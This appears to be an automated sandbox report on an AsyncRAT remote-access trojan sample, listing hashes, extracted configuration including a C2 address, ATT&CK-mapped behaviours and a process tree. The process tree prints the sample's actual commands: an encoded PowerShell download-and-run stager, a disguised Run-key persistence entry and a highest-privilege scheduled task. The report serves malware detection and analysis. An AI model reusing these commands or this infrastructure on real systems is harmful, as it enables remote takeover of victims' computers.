asyncrat | 0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03

General

Target

80b5367dce5fa3438971148c591192bb.exe
Size

5KB
MD5

80b5367dce5fa3438971148c591192bb
SHA1

e64e614bdc92464d237706a1ec8f16c4d030771a
SHA256

0de5d8b27608374949ef0271695ecab50c3b8384cfd875e2679b4a7a1772ac03
SHA512

0ec3553f437de1de9a3fc04013626cb3dc55e33ecdd26480383782f4b40c36119b985663a190c2ebdbf021b0252d27108a8c9a08df8adcd88153e3efbe5df1f3
SSDEEP

96:gf53TE79fkCFHGHtZsfvk+JCAYBsRvk+JCnSvFd3ojXLrl:O53O9fPFmHryvkUY6vkdaFd6

Score

10^/10

asyncrat defendersmartscren persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/848-149-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

33 3024 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

3.exe

pid process

1612 3.exe

flow	pid	process
33	3024	powershell.exe

pid	process
1612	3.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

80b5367dce5fa3438971148c591192bb.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	80b5367dce5fa3438971148c591192bb.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

3.exe

description pid process target process

PID 1612 set thread context of 848 1612 3.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3092 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3024 powershell.exe
3024 powershell.exe
4228 powershell.exe
4228 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3024 powershell.exe
Token: SeDebugPrivilege 4228 powershell.exe

description	pid	process	target process
PID 1612 set thread context of 848	1612	3.exe	RegAsm.exe

pid	process
3092	schtasks.exe

pid	process
3024	powershell.exe
3024	powershell.exe
4228	powershell.exe
4228	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

80b5367dce5fa3438971148c591192bb.exepowershell.exe3.execmd.exe

description	pid	process	target process
PID 1484 wrote to memory of 3024	1484	80b5367dce5fa3438971148c591192bb.exe	powershell.exe
PID 1484 wrote to memory of 3024	1484	80b5367dce5fa3438971148c591192bb.exe	powershell.exe
PID 3024 wrote to memory of 1612	3024	powershell.exe	3.exe
PID 3024 wrote to memory of 1612	3024	powershell.exe	3.exe
PID 3024 wrote to memory of 1612	3024	powershell.exe	3.exe
PID 1612 wrote to memory of 4228	1612	3.exe	powershell.exe
PID 1612 wrote to memory of 4228	1612	3.exe	powershell.exe
PID 1612 wrote to memory of 4228	1612	3.exe	powershell.exe
PID 1612 wrote to memory of 4216	1612	3.exe	cmd.exe
PID 1612 wrote to memory of 4216	1612	3.exe	cmd.exe
PID 1612 wrote to memory of 4216	1612	3.exe	cmd.exe
PID 4216 wrote to memory of 3092	4216	cmd.exe	schtasks.exe
PID 4216 wrote to memory of 3092	4216	cmd.exe	schtasks.exe
PID 4216 wrote to memory of 3092	4216	cmd.exe	schtasks.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe
PID 1612 wrote to memory of 848	1612	3.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\80b5367dce5fa3438971148c591192bb.exe
"C:\Users\Admin\AppData\Local\Temp\80b5367dce5fa3438971148c591192bb.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZAByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADMAMgAzADUAOAAyADAANwA2ADAAOQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGcAZwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB1AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwB3AHkAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQA8ACMAZABjAHIAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024

C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
4⤵
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:3092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:848

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Roaming\3.exe
Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\3.exe
Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
memory/848-149-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/848-148-0x0000000000000000-mapping.dmp

Download
memory/1484-135-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp

Filesize
10.8MB

Download
memory/1484-132-0x00000000000B0000-0x00000000000B8000-memory.dmp

Filesize
32KB

Download
memory/1612-142-0x0000000000DD0000-0x0000000000DEC000-memory.dmp

Filesize
112KB

Download
memory/1612-143-0x0000000005C70000-0x0000000006214000-memory.dmp

Filesize
5.6MB

Download
memory/1612-138-0x0000000000000000-mapping.dmp

Download
memory/3024-140-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp

Filesize
10.8MB

Download
memory/3024-134-0x000001EAEDA50000-0x000001EAEDA72000-memory.dmp

Filesize
136KB

Download
memory/3024-137-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp

Filesize
10.8MB

Download
memory/3024-133-0x0000000000000000-mapping.dmp

Download
memory/3024-136-0x00007FFAAED70000-0x00007FFAAF831000-memory.dmp

Filesize
10.8MB

Download
memory/3092-146-0x0000000000000000-mapping.dmp

Download
memory/4216-145-0x0000000000000000-mapping.dmp

Download
memory/4228-155-0x0000000005B60000-0x0000000005B7E000-memory.dmp

Filesize
120KB

Download
memory/4228-158-0x0000000006100000-0x000000000611E000-memory.dmp

Filesize
120KB

Download
memory/4228-151-0x0000000004B40000-0x0000000004B62000-memory.dmp

Filesize
136KB

Download
memory/4228-152-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/4228-153-0x00000000054B0000-0x0000000005516000-memory.dmp

Filesize
408KB

Download
memory/4228-147-0x0000000004500000-0x0000000004536000-memory.dmp

Filesize
216KB

Download
memory/4228-144-0x0000000000000000-mapping.dmp

Download
memory/4228-156-0x0000000006B20000-0x0000000006B52000-memory.dmp

Filesize
200KB

Download
memory/4228-157-0x0000000073650000-0x000000007369C000-memory.dmp

Filesize
304KB

Download
memory/4228-150-0x0000000004BE0000-0x0000000005208000-memory.dmp

Filesize
6.2MB

Download
memory/4228-159-0x00000000074B0000-0x0000000007B2A000-memory.dmp

Filesize
6.5MB

Download
memory/4228-160-0x0000000006E60000-0x0000000006E7A000-memory.dmp

Filesize
104KB

Download
memory/4228-161-0x0000000006ED0000-0x0000000006EDA000-memory.dmp

Filesize
40KB

Download
memory/4228-162-0x00000000070E0000-0x0000000007176000-memory.dmp

Filesize
600KB

Download
memory/4228-163-0x0000000007090000-0x000000000709E000-memory.dmp

Filesize
56KB

Download
memory/4228-164-0x00000000071A0000-0x00000000071BA000-memory.dmp

Filesize
104KB

Download
memory/4228-165-0x0000000007180000-0x0000000007188000-memory.dmp

Filesize
32KB

Download
memory/4228-166-0x00000000071C0000-0x00000000071E2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads